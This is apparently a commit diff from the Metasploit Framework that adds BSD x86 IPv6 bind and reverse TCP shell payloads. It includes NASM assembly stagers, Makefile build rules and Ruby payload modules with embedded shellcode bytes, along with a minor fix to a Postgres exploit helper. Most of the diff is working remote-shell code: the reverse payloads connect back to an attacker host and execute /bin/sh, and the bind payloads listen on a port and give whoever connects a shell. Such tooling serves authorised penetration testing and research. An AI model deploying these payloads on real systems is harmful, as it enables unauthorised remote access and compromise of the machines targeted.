Merge branch 'master' of github.com:rapid7/metasploit-framework

external/source/shellcode/Makefile.incl

@@ -1,2 +1,3 @@
-BUILDASM=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
-BUILDASMBSD=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
+BUILDASM=do echo -n "Building (ASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
+
+BUILDASMBSD=do echo -n "Building (BSDASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm

external/source/shellcode/bsd/ia32/Makefile

@@ -1,7 +1,7 @@
 ASM=nasm
-STAGERS=stager_sock_bind stager_sock_find stager_sock_reverse
+STAGERS=stager_sock_bind stager_sock_bind_ipv6 stager_sock_find stager_sock_reverse stager_sock_reverse_ipv6
 STAGES=stage_tcp_shell
-SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock
+SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock single_reverse_tcp_shell_ipv6 single_bind_tcp_shell_ipv6
 OBJS=${STAGERS} ${STAGES} ${SINGLE}
 
 include ../../Makefile.incl

external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm

@@ -0,0 +1,36 @@
+;;
+; 
+;        Name: single_bind_tcp_shell
+;     Version: $Revision: 1628 $
+;     License: 
+;
+;        This file is part of the Metasploit Exploit Framework
+;        and is subject to the same licenses and copyrights as
+;        the rest of this package.
+;
+; Description:
+;
+;        Single portbind TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Shell
+; meta-description=Listen on a port and spawn a shell
+; meta-authors=skape <mmiller [at] hick.org>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=bind
+; meta-name=bind_tcp_shell
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=0x8
+;;
+BITS   32
+
+%define  USE_SINGLE_STAGE 1
+
+%include "generic.asm"
+%include "stager_sock_bind_ipv6.asm"
+
+shell:
+	execve_binsh EXECUTE_REDIRECT_IO

external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm

@@ -0,0 +1,42 @@
+;;
+; 
+;        Name: single_reverse_tcp_shell
+;     Version: $Revision: 1626 $
+;     License: 
+;
+;        This file is part of the Metasploit Exploit Framework
+;        and is subject to the same licenses and copyrights as
+;        the rest of this package.
+;
+; Description:
+;
+;        Single reverse TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Shell
+; meta-description=Connect back to the attacker and spawn a shell
+; meta-authors=skape <mmiller [at] hick.org>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_shell
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=0x0a
+; meta-offset-lport=0x13
+;;
+BITS   32
+
+%define  USE_SINGLE_STAGE 1
+%define  ASSUME_REG_EAX   0
+
+; If you're on FreeBSD you can assume the state of edx to be 2, but NetBSD 
+; clears edx.
+; %define  ASSUME_REG_EDX   2
+
+%include "stager_sock_reverse_ipv6.asm"
+%include "generic.asm"
+
+shell:
+	execve_binsh EXECUTE_REDIRECT_IO

external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm

@@ -0,0 +1,108 @@
+;;
+; 
+;        Name: stager_sock_bind_ipv6
+;   Qualities: Can Have Nulls
+;     Version: $Revision: 1628 $
+;     License: 
+;
+;        This file is part of the Metasploit Exploit Framework
+;        and is subject to the same licenses and copyrights as
+;        the rest of this package.
+;
+; Description:
+;
+;        Implementation of a BSD portbind over IPv6 TCP stager.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Stager
+; meta-description=Listen on a port for a connection and run a second stage
+; meta-authors=skape <mmiller [at] hick.org>, vlad902 <vlad902 [at] gmail.com>, hdm <hdm [at] metasploit.com>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=bind
+; meta-name=bind_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=26
+;;
+BITS   32
+GLOBAL main
+
+main:
+
+socket:
+	xor eax, eax
+	push eax        ;   Protocol: (IP=0)
+	inc eax
+	push eax        ;       Type: (SOCK_STREAM=1)
+	push byte 28    ;     Domain: (PF_INET6=28)
+	push byte 97
+	pop  eax        ; socket()
+	push eax        ; padding
+	int  0x80
+	mov ebx, eax    ; save socket
+	
+	xor edx, edx
+
+	push edx	          ; uint32_t        sin6_scope_id;  /* scope zone index */			
+	push edx              ; struct in6_addr sin6_addr;      /* IP6 address */
+	push edx
+	push edx
+	push edx
+	push edx              ; uint32_t        sin6_flowinfo;  /* IP6 flow information */
+	push dword 0xbfbf1c1c      
+	                      ; in_port_t       sin6_port;      /* Transport layer port # */
+	                      ; uint8_t         sin6_len;       /* length of this struct */
+                          ; sa_family_t     sin6_family;    /* AF_INET6 */
+			
+	mov ecx, esp
+
+bind:
+	push byte 28
+	push ecx
+	push eax
+	push byte 104
+	pop  eax
+	push eax ; padding
+	int  0x80
+
+listen:
+	mov  al, 106
+	int  0x80
+
+accept:
+	push edx
+	push ebx
+%ifndef USE_SINGLE_STAGE
+	mov  dh, 0x10
+%endif
+	push edx
+	mov  al, 30
+	int  0x80
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+	push ecx
+	push eax
+	push ecx
+%ifdef FD_REG_EBX
+	xchg eax, ebx
+%else
+	xchg eax, edi
+%endif
+	push byte 0x3
+	pop  eax
+	int  0x80
+	ret
+
+%else
+
+%ifdef FD_REG_EBX
+	xchg eax, ebx
+%else
+	xchg eax, edi
+%endif
+
+%endif

external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm

@@ -0,0 +1,112 @@
+;;
+; 
+;        Name: stager_sock_reverse_ipv6
+;   Qualities: Can Have Nulls
+;     Version: $Revision: 1626 $
+;     License: 
+;
+;        This file is part of the Metasploit Exploit Framework
+;        and is subject to the same licenses and copyrights as
+;        the rest of this package.
+;
+; Description:
+;
+;        Implementation of a BSD reverse TCP stager over IPv6
+;
+;        File descriptor in edi.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Stager
+; meta-description=Connect back to the framework and run a second stage
+; meta-authors=skape <mmiller [at] hick.org>, vlad902 <vlad902 [at] gmail.com>, hdm <hdm [at] metasploit.com>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=43
+; meta-offset-lport=36
+; meta-offset-scope=59
+;;
+BITS   32
+GLOBAL main
+
+main:
+
+socket:
+
+	xor eax, eax
+	push eax        ;   Protocol: (IP=0)
+	inc eax
+	push eax        ;       Type: (SOCK_STREAM=1)
+	push byte 28    ;     Domain: (PF_INET6=28)
+
+	push byte 97
+	pop  eax        ; socket()
+	push eax        ; padding
+	int  0x80
+	jmp short bounce_to_connect
+	
+connect:
+	pop ecx
+	push byte 28
+	push ecx
+	push eax
+
+%ifdef FD_REG_EBX
+	xchg eax, ebx
+%else
+	xchg eax, edi
+%endif
+
+	push byte 98
+	pop  eax
+	push eax ; padding
+	int  0x80
+
+	jmp short skip_bounce
+
+bounce_to_connect:
+	call connect
+	
+ipv6_address:
+	db 28          ; uint8_t         sin6_len;       /* length of this struct */
+	db 28          ; sa_family_t     sin6_family;    /* AF_INET6 */
+	dw 0xbfbf      ; in_port_t       sin6_port;      /* Transport layer port # */
+	dd 0           ; uint32_t        sin6_flowinfo;  /* IP6 flow information */
+	dd 0           ; struct in6_addr sin6_addr;      /* IP6 address */
+	dd 0
+	dd 0
+	dd 0x01000000  ; default to ::1
+	dd 0           ; uint32_t        sin6_scope_id;  /* scope zone index */
+
+skip_bounce:
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+	push byte 0x10
+	pop edx
+	shl edx, 8
+	sub esp, edx
+	mov ecx, esp ; Points to 4096 stack buffer
+	
+	push edx     ; Length
+	push ecx     ; Buffer
+	
+%ifdef FD_REG_EBX
+	push ebx     ; Socket
+%else
+	push edi     ; Socket
+%endif	
+
+	push ecx     ; Buffer to Return
+	
+	mov al, 0x3	
+	int 0x80     ; read(socket, &buff, 4096)
+	
+	ret          ; Return
+
+%endif

lib/msf/core/exploit/postgres.rb

@@ -245,7 +245,7 @@ module Exploit::Remote::Postgres
 		if datastore['PASSWORD'].to_s.size > 0
 			datastore['PASSWORD'].to_s
 		else
-			'INVALID_' + Rex::Text.rand_text_alpha(rand(6))
+			'INVALID_' + Rex::Text.rand_text_alpha(rand(6) + 1)
 		end
 	end
 

modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb

@@ -0,0 +1,52 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Bsd
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BSD Command Shell, Bind TCP Inline (IPv6)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection and spawn a command shell over IPv6',
+			'Author'        => ['skape', 'vlad902', 'hdm'],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'bsd',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShellUnix,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'LPORT'    => [ 26, 'n' ],
+						},
+					'Payload' =>
+						"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\x89\xc3\x31" +
+						"\xd2\x52\x52\x52\x52\x52\x52\x68\x1c\x1c\xbf\xbf\x89\xe1\x6a\x1c" +
+						"\x51\x50\x6a\x68\x58\x50\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0" +
+						"\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49" +
+						"\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" +
+						"\x54\x53\x53\xb0\x3b\xcd\x80"
+
+				}
+			))
+	end
+
+end

modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb

@@ -0,0 +1,56 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Bsd
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BSD Command Shell, Reverse TCP Inline (IPv6)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Connect back to attacker and spawn a command shell over IPv6',
+			'Author'        => [ 'skape', 'vlad902', 'hdm' ],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'bsd',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShellUnix,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'LHOST'    => [ 42, 'ADDR6' ],
+							'LPORT'    => [ 36, 'n'    ],
+							'SCOPEID'  => [ 58, 'V'    ]
+						},
+					'Payload' =>
+						"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
+						"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
+						"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+						"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x02" +
+						"\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" +
+						"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"					
+				}
+		))
+		register_options([
+			OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])
+		])		
+	end
+
+end

modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb

@@ -0,0 +1,58 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+
+###
+#
+# BindTcp
+# -------
+#
+# BSD bind TCP stager.
+#
+###
+module Metasploit3
+
+	include Msf::Payload::Stager
+
+	def self.handler_type_alias
+		"bind_ipv6_tcp"
+	end
+	
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Bind TCP Stager (IPv6)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection over IPv6',
+			'Author'        =>  ['skape', 'vlad902', 'hdm'],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'bsd',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 26, 'n'    ],
+						},
+					'Payload' =>
+						"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\x89\xc3\x31" +
+						"\xd2\x52\x52\x52\x52\x52\x52\x68\x1c\x1c\xbf\xbf\x89\xe1\x6a\x1c" +
+						"\x51\x50\x6a\x68\x58\x50\xcd\x80\xb0\x6a\xcd\x80\x52\x53\xb6\x10" +
+						"\x52\xb0\x1e\xcd\x80\x51\x50\x51\x97\x6a\x03\x58\xcd\x80\xc3"
+				}
+			))
+	end
+
+end

modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb

@@ -0,0 +1,67 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+
+###
+#
+# ReverseTcp
+# ----------
+#
+# BSD reverse TCP stager.
+#
+###
+module Metasploit3
+
+	include Msf::Payload::Stager
+
+
+	def self.handler_type_alias
+		"reverse_ipv6_tcp"
+	end
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Reverse TCP Stager (IPv6)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Connect back to the attacker over IPv6',
+			'Author'        =>  ['skape', 'vlad902', 'hdm'],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'bsd',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LHOST'    => [ 42, 'ADDR6' ],
+							'LPORT'    => [ 36, 'n'    ],
+							'SCOPEID'  => [ 58, 'V'    ]
+						},
+					'Payload' =>
+					
+						"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
+						"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
+						"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+						"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x10" +
+						"\x5a\xc1\xe2\x08\x29\xd4\x89\xe1\x52\x51\x57\x51\xb0\x03\xcd\x80" +
+						"\xc3"
+				}
+			))
+		register_options([
+			OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])
+		])				
+	end
+
+end